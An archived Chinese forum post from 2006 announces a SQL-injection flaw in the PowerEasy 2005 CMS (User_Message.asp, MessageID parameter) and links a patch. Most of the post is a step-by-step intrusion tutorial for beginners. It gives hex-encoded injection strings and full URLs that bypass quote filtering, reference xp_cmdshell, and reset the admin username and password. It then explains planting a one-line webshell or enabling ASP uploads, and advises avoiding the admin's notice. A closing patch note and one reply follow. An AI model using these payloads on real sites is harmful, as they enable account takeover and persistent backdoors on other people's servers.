动易2005最新漏洞及补丁

dirtysea 发表于 2006-1-17 23:20:04

影响版本: 标准版 SQL版 企业版 SQL版 学校版 SQL版 政府版 SQL版 全功能版 SQL版 免费access 版 所有版本（包括免费版、商业SQL版及Access版） 不被影响的版本：2005动易ASSESS版 漏洞文件：Admin目录下 Admin_ChkPurview.asp，Admin_Login.asp，Admin_RootClass_Menu.asp User 目录下 User_Message.asp 等级：严重 <IMG src="http://www.21safe.com/editor/UploadFile/2005-8/12/2005812121445948.gif"> 描述： 此漏洞影响全部SQL版，如果用SA连接数据库黑客可以拿到系统管理员权限。如果用普通用户连接最严重情况，可以备份脚本木马。一般情况可能改管理员登陆密码，从而达到黑客登陆动易后台。控制整个动易系统！ ACCESS版可以得到管理员md5密码！ 主要问题在于 User_Message.asp <A title=http://77169.org/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=90; href="http://77169.org/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=90;" target=_blank>http://77169.org/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=90;</A> MessageID 没有严格过滤，有注入漏洞。只过滤了单引号，这就能挡住聪明的黑客吗？ 我们来看一下，User_Message.asp的源代码、 ————————————————————————————————————  <% Call PE_Execute("PE_AdminCommon", "User_Message") %> —————————————————————————————————————— 动易系统是不开放源代码的，User_Message.asp 源代码的意思就是调用 PE_AdminCommon.dll 中的 User_Message 函数。 有人可能要问了这样的漏洞怎么发现的呢？ 像这样的文件只能用分支测试法给这个文件用到的全部变量都测试一遍。这是很耗时的测试方法。 2，分析漏洞 源程序是不开放的，所以源程序没什么好分析的。 现在我们来这漏洞入侵动易2005 sp1系统。 首先分两个版来说 1,SQL版， （1，发现注入点 User_Message.asp 文件中的 MessageID 没有严格过滤。 测试，加单引号， 正常返回。如图一 
<DIV style="OVERFLOW-X: auto; WIDTH: 100%"><A href="http://www.21safe.com/editor/UploadFile/2005-8/12/2005812121451483.gif" target=_blank><IMG alt=attachments/200508/10_154208_1.gif src="http://www.21safe.com/editor/UploadFile/2005-8/12/2005812121451483.gif"></A></DIV> 加 ; ，加 -- 都显示出错。 如图二： 
<DIV style="OVERFLOW-X: auto; WIDTH: 100%"><A href="http://www.21safe.com/editor/UploadFile/2005-8/12/2005812121456680.gif" target=_blank target=_blank><IMG alt=attachments/200508/10_154337_2.gif src="http://www.21safe.com/editor/UploadFile/2005-8/12/2005812121456680.gif"></A></DIV> 看提示就明白有注入点了，加单引号没用，应当是过滤了引号。没关系过滤了单引号阻挡不了我们入侵的步伐。 （2，绕过单引号 估计注入点基本形式是这样的 select * from pe_XXX where MessageID=(注入点) 我们想注入这样的文件，就要绕过单引号。 下面这样的代码我们可以用它来绕过单引号。 declare @a sysname select @a=<command> exec master.dbo.xp_cmdshell @a 上面这语句主要是用来绕过单引号。不过我们要改一下， declare @a sysname select @a=<command> update pe_admin set password=@a where id=1-- ); declare @a sysname select @a=0x3300 update pe_admin set password=@a where id=1-- 完整的url <A title=http://192.168.1.254/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=3 href="http://192.168.1.254/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=3" target=_blank>http://192.168.1.254/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=3</A>);%20declare%20@a%20sysname%20select%20@a=0x3300%20update%20pe_admin%20set%20password=@a%20where%20id=1-- 这条语句是给后台的id=1的管理员密码改成 3。因为@a=0x3300 ，0x3300 是16进制的3. 执行成功之后如图3： 
<DIV style="OVERFLOW-X: auto; WIDTH: 100%"><A href="http://www.21safe.com/editor/UploadFile/2005-8/12/200581212156352.gif" target=_blank target=_blank><IMG alt=attachments/200508/10_154506_3.gif src="http://www.21safe.com/editor/UploadFile/2005-8/12/200581212156352.gif"></A></DIV> （3，得到管理员权限 分两步： 一，关联前台username 动易后台登陆要关联前台用户。 先设置后台管理员的前台用户名，为我们注册的用户。 declare @a sysname select @a=<command> update pe_admin set username=@a where id=1-- 说到这里，我要讲一下@a 如果改 比如我们注册的用户为111111 @a=0x310031003100310031003100 我怎么知道的呢？随便在网上找一个16进制转换器就知道了， 比如用这个工具转换也行。 如图4 
<DIV style="OVERFLOW-X: auto; WIDTH: 100%"><A href="http://www.21safe.com/editor/UploadFile/2005-8/12/2005812121510337.gif" target=_blank target=_blank><IMG alt=attachments/200508/10_154531_4.gif src="http://www.21safe.com/editor/UploadFile/2005-8/12/2005812121510337.gif"></A></DIV> 所以注入语句成了这样的 ); declare @a sysname select @a=0x310031003100310031003100 update pe_admin set username=@a where id=1-- 二，改后台登陆的password 接着给后台密码改成我们的密码。我们就可以想办法登陆了。 declare @a sysname select @a=<command> update pe_admin set password=@a where id=1-- 我们改后台密码，要改成已经加密的md5密码 比如我们提供一个，469e80d32c0559f8 这是admin888加密之后的MD5密码。 @a=0x3400360039006500380030006400330032006300300035003500390066003800 所以构造注入语句 ); declare @a sysname select @a=0x3400360039006500380030006400330032006300300035003500390066003800 update pe_admin set password=@a where id=1-- 大家感觉很简单吧！一般我们不这么做，教程写给新手看的，不能太难。 在真正的黑客行为中，如果给人家的后台密码改了，管理员登陆不上去。人家必然会发现的。 所以给高手提供思路自己研究一下。 比如 1，可以插入一个管理员用完之后删除 2，可以先暴出管理员密码，用完之后，再还原。 （4，上传木马 1，rootclass_menu_config.asp 文件中的菜单其它特效中插入一句话木马。 如图 5 
<DIV style="OVERFLOW-X: auto; WIDTH: 100%"><A href="http://www.21safe.com/editor/UploadFile/2005-8/12/2005812121512476.gif" target=_blank target=_blank><IMG alt=attachments/200508/10_154623_5.gif src="http://www.21safe.com/editor/UploadFile/2005-8/12/2005812121512476.gif"></A></DIV>
 插入一句话木马之后，你可以用客户端连接了。 2，给上传属性改成可以上传ASP类型。上传时抓包给最后一个加上结束符。（类似于动网上传） SQL版我只说这么多了，如果你上传不了木马，或者是找不到后台管理地址，来我们论坛提问吧!有我们有办法解决。 <A title=http://bbs.77169.com href="http://bbs.77169.com/" target=_blank>http://bbs.77169.com</A> 2,ACCESS版 （1，如果发现漏洞 在测试免费版的动易系统之时，发现免费的ACCESS版动易用户控制面板没有发送短消息的功能。 不过，动易留有相关接口，登陆用户控制面板直接浏览 User_Message.asp 也可以注入. （2，注入过程(略) mssql和access 注入过程是点不一样的。基本相同，这也留给大家自己去测试吧。 三，解决方案 临时解决方案： 解决方案（临时）：更新补丁包中的三个文件，并先删除user目录下的User_Message.asp文件。SP2正式版中将会修复此漏洞，请目前使用SP1的用户尽快打好此补丁。 补丁下载： <A title=http://download.asp163.net/PowerEasy2005SP1Patch.rar href="http://download.asp163.net/PowerEasy2005SP1Patch.rar" target=_blank>http://download.asp163.net/PowerEasy2005SP1Patch.rar</A> 
本地下载：<A href="http://www.21safe.com/files/asp/PowerEasy2005SP1Patch.rar" target=_blank>http://www.21safe.com/files/asp/PowerEasy2005SP1Patch.rar</A> 感谢llikz、怪狗等网友对系统进行安全检测并无私提供相关漏洞信息！

亮V剑 发表于 2006-1-19 07:38:09

re:动易2005最新漏洞及补丁

写的不错~！~
  你做的我更为欣赏~！~
    希望以后  在加努力

页: [1]

运维之家's Archiver

动易2005最新漏洞及补丁

re:动易2005最新漏洞及补丁